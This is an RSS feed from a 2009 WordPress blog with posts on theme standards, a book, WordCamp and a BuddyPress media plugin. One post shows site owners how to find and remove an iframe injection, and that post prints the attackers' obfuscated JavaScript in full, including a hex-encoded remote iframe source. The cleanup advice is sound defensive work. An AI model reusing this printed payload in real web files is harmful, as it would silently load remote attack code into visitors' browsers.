<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.wpveda.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:series="http://unfoldingneurons.com/" version="2.0">

<channel>
	<title>WpVeda</title>
	
	<link>http://wpveda.com</link>
	<description>Ultimate guide to Wordpress, MU, BuddyPress &amp; bbPress</description>
	<lastBuildDate>Wed, 30 Dec 2009 22:10:01 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.wpveda.com/wpveda" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="wpveda" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">wpveda</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><item>
		<title>Wordpress Themes – Standards and Checklists (beta)</title>
		<link>http://wpveda.com/wordpress-themes-standards-and-checklists/</link>
		<comments>http://wpveda.com/wordpress-themes-standards-and-checklists/#comments</comments>
		<pubDate>Fri, 11 Dec 2009 13:33:47 +0000</pubDate>
		<dc:creator>Rahul Bansal</dc:creator>
				<category><![CDATA[CSS]]></category>
		<category><![CDATA[Themes]]></category>
		<category><![CDATA[Checklists]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Standards]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=107</guid>
		<description><![CDATA[
			
				
			
		
This article was originally created (in parts) for rtCampers to guide our trainees and follow the best CSS and design practices. It is by no means complete but hopefully it will evolve over time as we get more mature with Wordpress, CSS and web-design in-general.
The goal of this article is to create a master list [...]<p><a href="http://wpveda.com/wordpress-themes-standards-and-checklists/">Wordpress Themes &#8211; Standards and Checklists (beta)</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



No related posts.]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fwordpress-themes-standards-and-checklists%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fwordpress-themes-standards-and-checklists%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p>This article was originally created (in parts) for rtCampers to guide our trainees and follow the best CSS and design practices. It is by no means complete but hopefully it will evolve over time as we get more mature with Wordpress, CSS and web-design in-general.</p>
<p>The goal of this article is to create a master list of standards that we want to follow while designing wordpress themes. Comments &amp; criticism &#8211; awaited!</p>
<h3>#1. Always Start with CSS-Reset</h3>
<p>CSS-Reset is a snippet of code that should be always pasted in your &#8220;style.css&#8221;.</p>
<p>CSS-Reset clears (nullify) formatting on all HTML tags. Each browser has its own default formatting for most HTML tags and they vary from browser-to-browser. CSS-Reset brings all browsers to common ground! <img src='http://wpveda.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p>There are many variation of CSS-Reset, but one I have always used is pasted below. It is from <a href="http://elliotjaystocks.com/starkers/">Stakers theme by Elliot Jay</a>, which has been starting point for most of my themes. I will talk about stakers theme in detail some other day!</p>
<p>[css]<br />
/* RESET */<br />
/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; */</p>
<p>/* Global reset */<br />
/* Based upon &#8216;reset.css&#8217; in the Yahoo! User Interface Library: http://developer.yahoo.com/yui */<br />
*, html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, label, fieldset, input, p, blockquote, th, td { margin:0; padding:0 }<br />
table { border-collapse:collapse; border-spacing:0 }<br />
fieldset, img { border:0 }<br />
address, caption, cite, code, dfn, em, strong, th, var { font-style:normal; font-weight:normal }<br />
ol, ul, li { list-style:none }<br />
caption, th { text-align:left }<br />
h1, h2, h3, h4, h5, h6 { font-size:100%; font-weight:normal }<br />
q:before, q:after { content:&#8221;}</p>
<p>/* Global reset-RESET */<br />
/* The below restores some sensible defaults */<br />
strong { font-weight:bold }<br />
em { font-style:italic }<br />
a img { border:none } /* Gets rid of IE&#8217;s blue borders */<br />
[/css]</p>
<h3 style="font-size: 1.17em">#2. Don&#8217;t forget to add CSS for Wordpress Generated classes</h3>
<p>Wordpress post-editor adds some classes like .alignleft, .alignright to the content. Also some template tags and standard widgets generates additional CSS classes that may be useful. More details about this can be found <a href="http://codex.wordpress.org/CSS#WordPress_Generated_Classes">here</a>.</p>
<p>At bare minimum you should have following CSS added in your theme.</p>
<p>[css]<br />
.aligncenter,<br />
div.aligncenter { display: block; margin-left: auto; margin-right: auto;}</p>
<p>.alignleft { float: left;}</p>
<p>.alignright { float: right;}<br />
[/css]</p>
<p>Also note coding style of above CSS block is different than style given on Wordpress codex page.</p>
<p>Its matter of personal choice. You can <a href="http://davematthewsblog.com/wp-content/themes/davematthewsblog/style.css">see my CSS coding style here</a>.</p>
<h3>#3. Javascripts in Wordpress Theme</h3>
<p>These days tabs and sliders are quite common among wordpress themes! Most of this fancy stuff is done using jQuery, its plugins and/or some extra javascript files.</p>
<p>Best way to include javascripts in wordpress theme is:  <a href="http://codex.wordpress.org/Function_Reference/wp_enqueue_script">wp_enqueue_script( ) function</a>.</p>
<p>Always create your own javascripts files under &#8220;js&#8221; folder in your themes directory.</p>
<p>For javascripts library, before adding/uploading a copy to your theme directory, <a href="http://codex.wordpress.org/Function_Reference/wp_enqueue_script#Default_scripts_included_with_WordPress">check list of javascript libraries that comes with wordpress</a>. All these default libraries can be included in your theme merely by calling <a href="http://codex.wordpress.org/Function_Reference/wp_enqueue_script">wp_enqueue_script( ) function</a>. There is no need to upload them separately in your theme. <img src='http://wpveda.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<h3>#4. Use Proper Test Data</h3>
<p>To properly test a theme you are developing, you need test-data that covers most commonly used type of contents.</p>
<p>By default, when you install a new wordpress it creates a &#8220;Hello World&#8221; post, a comment on that post, an &#8220;About&#8221; page and few more data which is completely useless if you are developing a theme. Also exporting data from real big blog for testing purpose may not be good idea. We need test-data which must have lots of variations rather than larger number of posts.</p>
<p>For this:</p>
<ol>
<li>Always test your theme with <a href="http://svn.automattic.com/wpcom-themes/test-data.2008-12-22.xml">standard test data given here</a>.</li>
<li>Above link open (or downloads) a XML file. Save it on your disk.</li>
<li>Then log into wordpress admin side. Go to <em>&#8220;Tools &gt;&gt; Import &gt;&gt; Wordpess&#8221; </em>and select XML file.</li>
<li>Its good idea to check &#8220;Download and import file attachments&#8221; checkbox on next screen</li>
</ol>
<p>Thats all! Now check each link/page on test site in each browser!</p>
<p>Standard test data and CSS-Reset will save your considerable time that goes wasted in support phase.</p>
<h3>#5. Final Testing &amp; Checklist!</h3>
<p>The biggest and most extensive <a href="http://codex.wordpress.org/Theme_Development_Checklist">checklist</a> with plenty of test-cases can be found on wordpress codex.</p>
<p>Any theme we develop must be tested against that checklist.</p>
<h3>#6. Additional Work for Public Themes</h3>
<p>In case you want to release your theme for public on official wordpress.org theme repo, then make sure you follow <a href="http://wordpress.org/extend/themes/about/">these guidelines</a>.</p>
<p>For GPL compatibility, you can simply put the following 2 lines in a comment block in top-portion of your <em>style.css</em> file.</p>
<p>[css]<br />
/* The CSS, XHTML and design is released under GPL:<br />
http://www.opensource.org/licenses/gpl-license.php */<br />
[/css]</p>
<p><em>(to be continued&#8230;)</em></p>
<p><a href="http://wpveda.com/wordpress-themes-standards-and-checklists/">Wordpress Themes &#8211; Standards and Checklists (beta)</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/wordpress-themes-standards-and-checklists/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Finding &amp; Removing malicious iframe exploit from Wordpress</title>
		<link>http://wpveda.com/finding-removing-malicious-iframes-from-wordpress/</link>
		<comments>http://wpveda.com/finding-removing-malicious-iframes-from-wordpress/#comments</comments>
		<pubDate>Mon, 07 Dec 2009 19:38:24 +0000</pubDate>
		<dc:creator>Rahul Bansal</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Iframe]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[xblacnknet]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=92</guid>
		<description><![CDATA[
			
				
			
		
Sometime back our one under-construction site was infected with iframe injection in its wordpress theme. As it was not live site, I didn&#8217;t care much. Today, my friend Federico&#8217;s company site &#8211; Helios Design was infected with the same exploit.
First&#8230; About the iframe exploit!
This exploit injected some malicious code into wordpress&#8217;s &#8220;wp-includes/js/jquery/jquery.js&#8221; file, highlighted in [...]<p><a href="http://wpveda.com/finding-removing-malicious-iframes-from-wordpress/">Finding &amp; Removing malicious iframe exploit from Wordpress</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



No related posts.]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Ffinding-removing-malicious-iframes-from-wordpress%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Ffinding-removing-malicious-iframes-from-wordpress%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p>Sometime back our one under-construction site was infected with iframe injection in its wordpress theme. As it was not live site, I didn&#8217;t care much. Today, my friend Federico&#8217;s company site &#8211; <a href="http://helios-designs.net/">Helios Design</a> was infected with the same exploit.</p>
<h2>First&#8230; About the iframe exploit!</h2>
<p>This exploit injected some malicious code into wordpress&#8217;s <em><strong>&#8220;wp-includes/js/jquery/jquery.js&#8221;</strong></em> file, highlighted in the following screenshot.</p>
<p><a href="http://www.wpveda.com/files/2009/12/Iframe-injection-in-jquery.js-Wordpress-Security-Issue-1.jpg"><img class="alignnone size-large wp-image-93" title="Iframe injection in jquery.js - Wordpress Security Issue-1" src="http://www.wpveda.com/files/2009/12/Iframe-injection-in-jquery.js-Wordpress-Security-Issue-1-590x345.jpg" alt="Iframe injection in jquery.js - Wordpress Security Issue-1" width="590" height="345" /></a></p>
<p>When compared to original wordpress file &#8211; <a href="http://svn.automattic.com/wordpress/tags/2.8.4/wp-includes/js/jquery/jquery.js">http://svn.automattic.com/wordpress/tags/2.8.4/wp-includes/js/jquery/jquery.js</a>, you can see some extra code was added at the top.</p>
<p>As a result, at runtime an iframe gets created which was executing a remote script. It also broke sites markup resulting in bad SEO and failed validation. Such exploits can further act as a ground to launch bigger attacks or may infect visitor&#8217;s computer.</p>
<p>If Google visits your site with such codes, your site may get blocked in browsers like Firefox, Chrome and Safari. In those cases, your visitor will get a big security alert when they attempt to visit your site.</p>
<h2>How-To fix this&#8230;</h2>
<p>Find the exact codes that are inserted in your theme. In my friend&#8217;s case, following codes were injected:</p>
<p><a href="http://www.wpveda.com/files/2009/12/iframe-codes-in-theme-2.jpg"><img class="alignnone size-full wp-image-95" title="iframe codes in theme-2" src="http://www.wpveda.com/files/2009/12/iframe-codes-in-theme-2.jpg" alt="iframe codes in theme-2" width="588" height="139" /></a></p>
<p>Now searching for <em>&#8220;src&#8221;</em> link wont be good idea. The guy who can inject above codes into wordpress (via third-party codes most probably) will not store its src URL in plain-text. Also, rather than searching for complete code, its better to search different parts.</p>
<p>In this case &#8211; I decided to search <em>&#8220;uKUwc&#8221;</em>,  <em>&#8220;xblacnknet.cn&#8221;</em> and <em>&#8220;kDaxV&#8221;</em> separately.</p>
<p>As far as searching is concerned there are 2 places to search &#8211; database and filesystem.</p>
<p><strong>For database search you can use</strong> &#8211; phyMyAdmin. If you don&#8217;t have phpMyAdmin, just install <a href="http://wordpress.org/extend/plugins/wp-phpmyadmin/">WP-phpMyAdmin plugin</a>.</p>
<p><strong>To search filesystem</strong> &#8211; open shell to your server and execute <em><strong>grep</strong></em> command like below:</p>
<p><code>grep -H -r "kDaxV" /path/to/wp-root-dir</code></p>
<p>Substitute <em>&#8220;/path/to/wp-root-dir&#8221;</em> with filesystem path to the directory where wordpress is installed. &#8220;kDaxV&#8221; is a search string. Try different search strings unless u get any result. &#8220;-r&#8221; forces grep to search recursively and &#8220;-H&#8221; make it print filenames. Above command will perform search inside file contents.</p>
<p>For more details on this command <a href="http://www.cyberciti.biz/faq/howto-search-find-file-for-text-string/">refer this article by Vivek Gite</a>.</p>
<p>Executing above command resulted in following output:</p>
<blockquote><p>./wp-includes/js/jquery/jquery.js:var/**/YFiXz/**/=/**/document;function/**/ugGMs(czlmZ){/**/var/**/cZdbo/**/=/**/&#8221;",/**/aujtC/**/=/**/0;for/**/(aujtC=czlmZ.length-1;aujtC&gt;=0;aujtC&#8211;){cZdbo/**/+=/**/czlmZ.charAt(aujtC);}/**/return/**/cZdbo;}function/**/xHiRm(UbqcV){UbqcV/**/=/**/UbqcV.replace(/[\.]/g,/**/&#8221;%&#8221;);UbqcV/**/=/**/unescape(UbqcV);return/**/ugGMs(UbqcV);}function/**/WDxZS(){document.write(&#8220;&lt;style&gt;.kDaxV{width:0%;height:0%;border:none;}&lt;/style&gt;&#8221;);var/**/KJKbL/**/=/**/&#8221;&lt;iframe/**/name=\&#8221;3\&#8221; id=\&#8221;uKUwc\&#8221; src=\&#8221;$\&#8221; class=\&#8221;kDaxV\&#8221;&gt;&lt;/iframe&gt;&#8221;;var/**/Xqvgy/**/=/**/KJKbL.replace(/[\+$]/g,/**/xHiRm(&#8220;.69.67.63.2e.76.2f.76.2f.6e.69.62.2d.69.67.63.2f.6e.63.2e.74.65.6e.6b.63.61.6c.62.78.2f.2f.3a.70.74.74.68&#8243;));return/**/Xqvgy;}YFiXz.writeln(WDxZS());</p></blockquote>
<p>Once you find exact file, either you can remove malicious codes from it or replace that file with original version form <a href="http://svn.automattic.com/wordpress/">wordpress repo</a>.</p>
<p>Hope this helps someone out there! <img src='http://wpveda.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a href="http://wpveda.com/finding-removing-malicious-iframes-from-wordpress/">Finding &amp; Removing malicious iframe exploit from Wordpress</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/finding-removing-malicious-iframes-from-wordpress/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>“Digging Into Wordpress” – The Wordpress Bible Everyone Should Read!</title>
		<link>http://wpveda.com/digging-into-wordpress-the-wordpress-bible-everyone-should-read/</link>
		<comments>http://wpveda.com/digging-into-wordpress-the-wordpress-bible-everyone-should-read/#comments</comments>
		<pubDate>Thu, 19 Nov 2009 15:55:46 +0000</pubDate>
		<dc:creator>Rahul Bansal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[Books]]></category>
		<category><![CDATA[Digging into Wordpress]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=81</guid>
		<description><![CDATA["Digging Into Wordpress" is the Wordpress bible which covers tutorials, code-samples and concise information over every aspect of wordpress - setup, administration, customization, optimization, themes designing, SEO and everything else you can imagine with wordpress!<p><a href="http://wpveda.com/digging-into-wordpress-the-wordpress-bible-everyone-should-read/">&#8220;Digging Into Wordpress&#8221; &#8211; The Wordpress Bible Everyone Should Read!</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



No related posts.]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fdigging-into-wordpress-the-wordpress-bible-everyone-should-read%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fdigging-into-wordpress-the-wordpress-bible-everyone-should-read%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p><a href="http://www.wpveda.com/go/digwp/"><img class="alignright size-full wp-image-82" src="http://www.wpveda.com/files/2009/11/Digging-Into-Wordpress.png" alt="Digging-Into-Wordpress" width="125" height="125" /></a><a href="http://www.wpveda.com/go/digwp/">&#8220;Digging Into Wordpress&#8221;</a> is the Wordpress bible authored by <a href="http://chriscoyier.net/">Chris Coyier</a> (<a href="http://css-tricks.com/">CSS-Tricks</a>) and <a href="http://digwp.com/jeff-starr/">Jeff Starr</a> (<a href="http://perishablepress.com/">Perishable Press</a>).</p>
<p>This book covers tutorials, code-samples and concise information on every aspect of wordpress &#8211; setup, administration, customization, optimization, themes designing, SEO and everything else you can imagine with wordpress! Except plugin development it covers everything in great depth.</p>
<h3>List of Chapters:</h3>
<ol>
<li>Welcome to WordPress</li>
<li>Setting Up WordPress</li>
<li>Anatomy of a WordPress Theme</li>
<li>Theme Design and Development</li>
<li>Extending Functionality <em>(covers using wordpress as a CMS)</em></li>
<li>Working with RSS Feeds</li>
<li>Working with Comments</li>
<li>Search Engine Optimization</li>
<li>Maintaining a Healthy Site</li>
</ol>
<h3>Demo Version</h3>
<p>You can check <a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fcss-tricks.com%2Fpdfs%2FDigging-Into-WP-DEMO.pdf&amp;h=49187b3cdd853a4e41af6d8585da3cbc">PDF file containing </a><em><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fcss-tricks.com%2Fpdfs%2FDigging-Into-WP-DEMO.pdf&amp;h=49187b3cdd853a4e41af6d8585da3cbc">Table of Contents</a></em><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fcss-tricks.com%2Fpdfs%2FDigging-Into-WP-DEMO.pdf&amp;h=49187b3cdd853a4e41af6d8585da3cbc"> and a sample chapter</a>.</p>
<p>Many of us will need this before making our mind to buy this book!</p>
<h3>Discount (Promo) Code</h3>
<p>You can get <strong>$5</strong> off by using promo code <strong>DIWCSS</strong></p>
<p>This book is prized at <strong>$27</strong> but above promo code will make it available for <strong>$22</strong>!</p>
<h3>Special Thanks from rtCamp</h3>
<p>Our company, <a href="http://rtcamp.com/">rtCamp</a>, has had a hard-time preparing wordpress training materials for our new joinees.</p>
<p>This book will be really helpful to us and will surely remove a load from our senior developers&#8217; shoulders.</p>
<p>We are already using great <a href="http://css-tricks.com/video-screencasts/">screencasts</a> and <a href="http://css-tricks.com/snippets/">code-snippets</a> by Chris Coyier to teach many things to our fresh coders and now with this book from Chris, we can not stop thanking this maestro enough.</p>
<p><strong>Link:</strong> <a href="http://www.wpveda.com/go/digwp/">Digging into Wordpress</a></p>
<p><a href="http://wpveda.com/digging-into-wordpress-the-wordpress-bible-everyone-should-read/">&#8220;Digging Into Wordpress&#8221; &#8211; The Wordpress Bible Everyone Should Read!</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/digging-into-wordpress-the-wordpress-bible-everyone-should-read/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How NOT to miss any WordCamp!</title>
		<link>http://wpveda.com/how-not-to-miss-any-wordcamp/</link>
		<comments>http://wpveda.com/how-not-to-miss-any-wordcamp/#comments</comments>
		<pubDate>Fri, 13 Nov 2009 16:56:18 +0000</pubDate>
		<dc:creator>Aditya Kane</dc:creator>
				<category><![CDATA[Events]]></category>
		<category><![CDATA[WordCamp]]></category>
		<category><![CDATA[WCNYC]]></category>
		<category><![CDATA[WordCamp NYC 2009]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=64</guid>
		<description><![CDATA[
			
				
			
		
If you are using Wordpress for blogging or development you are probably burning with desire to be present in New York City where WordCamp will be held on this weekend.
With over 50 speakers and many more wordpress experts in attendance, I would surely love to be there, just enriching myself with ideas they will be sharing. [...]<p><a href="http://wpveda.com/how-not-to-miss-any-wordcamp/">How NOT to miss any WordCamp!</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



No related posts.]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fhow-not-to-miss-any-wordcamp%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fhow-not-to-miss-any-wordcamp%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p>If you are using Wordpress for blogging or development you are probably burning with desire to be present in New York City where <a href="http://2009.newyork.wordcamp.org/">WordCamp</a> will be held on this weekend.</p>
<p>With over <a href="http://2009.newyork.wordcamp.org/speakers/">50 speakers</a> and many more wordpress experts in attendance, I would surely love to be there, just enriching myself with ideas they will be sharing. But the fact is, there is no way I can arrange for the resources for being part of <a href="http://2009.newyork.wordcamp.org/">WordCamp in New York</a>. Even our developers at <a href="http://rtcamp.com/">rtCamp</a> were doing a bit of day dreaming about hoping onto the next flight to New York.</p>
<p>Then I came across <a href="http://weblogtoolscollection.com/archives/2009/11/12/i-wish-i-was-at-wordcamp/">this post on weblogtoolscollection</a> which mentioned in a very tongue in cheek manner the website with name - <a href="http://iwishiwasatwordcamp.com/nyc-2009/">I wish I was at Word Camp</a> <img src='http://wpveda.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<h3>About <a href="http://iwishiwasatwordcamp.com/nyc-2009/">I Wish I was at Word Camp</a>&#8230;</h3>
<p><a href="http://iwishiwasatwordcamp.com/nyc-2009/">I Wish I was at Word Camp</a> is a amazing website to keep in touch with what is happening at Word Camp New York. It comes with the tag line <em>&#8216;Couldn&#8217;t cough up the money, huh?&#8217; </em>which shows a humorous side to the fact that even if you are in New York and not 10,000 miles away, the entry fee for a Sunday afternoon is <strong>$25</strong> and if you want to attend the whole weekend and share your knowledge on Wordpress it can go up to as high as <strong>$500</strong>.</p>
<p><a href="http://iwishiwasatwordcamp.com/"><img class="alignnone size-full wp-image-66" style="border: 1px solid grey" src="http://www.wpveda.com/files/2009/11/iwishiwasatwordcamp.png" alt="iwishiwasatwordcamp" width="500" height="405" /></a></p>
<p><a href="http://iwishiwasatwordcamp.com/nyc-2009/">I wish I was at Word Camp</a> is quite handy when it comes to real time monitoring of events through various feeds on their homepage. It has design like <a href="http://popurls.com/">PopUrls</a> (<a href="http://www.devilsworkshop.org/popurls-best-place-to-know-whats-happening-in-the-world/">read review</a>) and purpose to.</p>
<p>From one page you can check twitter accounts of few top Wordpress developers as well as can keep an eye on WordCamp NYC 2009&#8217;s twitter hashtag &#8211; #wcnyc</p>
<p>The website also includes pictures of participants posted through Flickr.</p>
<p>It seems like the folks at Word Camp are already started to enjoy! <img src='http://wpveda.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p><a href="http://wpveda.com/how-not-to-miss-any-wordcamp/">How NOT to miss any WordCamp!</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/how-not-to-miss-any-wordcamp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BuddyPress Kaltura Media Component for BuddyPress version 1.1</title>
		<link>http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/</link>
		<comments>http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/#comments</comments>
		<pubDate>Tue, 10 Nov 2009 15:11:49 +0000</pubDate>
		<dc:creator>Rahul Bansal</dc:creator>
				<category><![CDATA[BuddyPress]]></category>
		<category><![CDATA[Plugins]]></category>
		<category><![CDATA[Wordpress MU]]></category>
		<category><![CDATA[Audio]]></category>
		<category><![CDATA[Component]]></category>
		<category><![CDATA[Images]]></category>
		<category><![CDATA[Kaltura]]></category>
		<category><![CDATA[Media]]></category>
		<category><![CDATA[Photos]]></category>
		<category><![CDATA[Pictures]]></category>
		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=58</guid>
		<description><![CDATA[
			
				
			
		

This post is to announce a big update to BuddyPress Kaltura Media Plugin which makes it compatible with BuddyPress version 1.1.x.
This feature was in so much demand that we added support for it ahead of time. It was originally planned for release towards the end of this month.
This new release have widget support for:

Recently Added Pictures
Recently Added Videos

You [...]<p><a href="http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/">BuddyPress Kaltura Media Component for BuddyPress version 1.1</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



Related posts:<ol<br/><h3>Related posts:</h3><ul><li><a href='http://wpveda.com/buddypress-kaltura-media-component/' rel='bookmark' title='Permanent Link: BuddyPress-Kaltura Media Component'>BuddyPress-Kaltura Media Component</a></li>
<li><a href='http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/' rel='bookmark' title='Permanent Link: Support for Kaltura CE is added to BuddyPress Media Plugin'>Support for Kaltura CE is added to BuddyPress Media Plugin</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fbuddypress-kaltura-media-component-for-buddypress-version-1-1%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fbuddypress-kaltura-media-component-for-buddypress-version-1-1%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p><a href="http://rtcamp.com/web/wp-content/uploads/2009/10/kaltura-open-source-video-community-logo.jpg"><img src="http://rtcamp.com/web/wp-content/uploads/2009/10/kaltura-open-source-video-community-logo.jpg" alt="kaltura-open-source-video-community-logo" width="221" height="94" /></a><a href="http://rtcamp.com/web/wp-content/uploads/2009/10/budypress_logo.gif"><img src="http://rtcamp.com/web/wp-content/uploads/2009/10/budypress_logo.gif" alt="budypress_logo" width="216" height="90" /></a></p>
<p>This post is to announce a big update to <a href="http://www.wpveda.com/buddypress-kaltura-media-component/">BuddyPress Kaltura Media Plugin</a> which makes it compatible with BuddyPress version 1.1.x.</p>
<p>This feature was in so much demand that we added support for it ahead of time. It was originally planned for release towards the end of this month.</p>
<p>This new release have widget support for:</p>
<ul>
<li>Recently Added Pictures</li>
<li>Recently Added Videos</li>
</ul>
<p>You can configure number of pictures/videos that will show.</p>
<p>You can see widget in action here &#8211; <a href="http://bp.rtcamp.in/bp1.1/">http://bp.rtcamp.in/bp1.1/</a></p>
<p>You can download new release from <a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/download/">this page</a>.  Look for highest version in 1.1.x series. As of now its 1.1.</p>
<p><strong>Link:</strong> <a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/">Wordpress Repo Page</a> | <a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/download/">Download Page</a> | <a href="http://downloads.wordpress.org/plugin/buddypress-kaltura-media-component.1.1.zip">Direct zip file link for v1.1</a></p>
<p><a href="http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/">BuddyPress Kaltura Media Component for BuddyPress version 1.1</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>Related posts:<ol<br/><h3>Related posts:</h3><ul><li><a href='http://wpveda.com/buddypress-kaltura-media-component/' rel='bookmark' title='Permanent Link: BuddyPress-Kaltura Media Component'>BuddyPress-Kaltura Media Component</a></li>
<li><a href='http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/' rel='bookmark' title='Permanent Link: Support for Kaltura CE is added to BuddyPress Media Plugin'>Support for Kaltura CE is added to BuddyPress Media Plugin</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>Support for Kaltura CE is added to BuddyPress Media Plugin</title>
		<link>http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/</link>
		<comments>http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/#comments</comments>
		<pubDate>Sun, 08 Nov 2009 11:12:00 +0000</pubDate>
		<dc:creator>Rahul Bansal</dc:creator>
				<category><![CDATA[BuddyPress]]></category>
		<category><![CDATA[Plugins]]></category>
		<category><![CDATA[Wordpress MU]]></category>
		<category><![CDATA[Components]]></category>
		<category><![CDATA[Kaltura]]></category>
		<category><![CDATA[Kaltura CE]]></category>
		<category><![CDATA[Media]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=46</guid>
		<description><![CDATA[
			
				
			
		

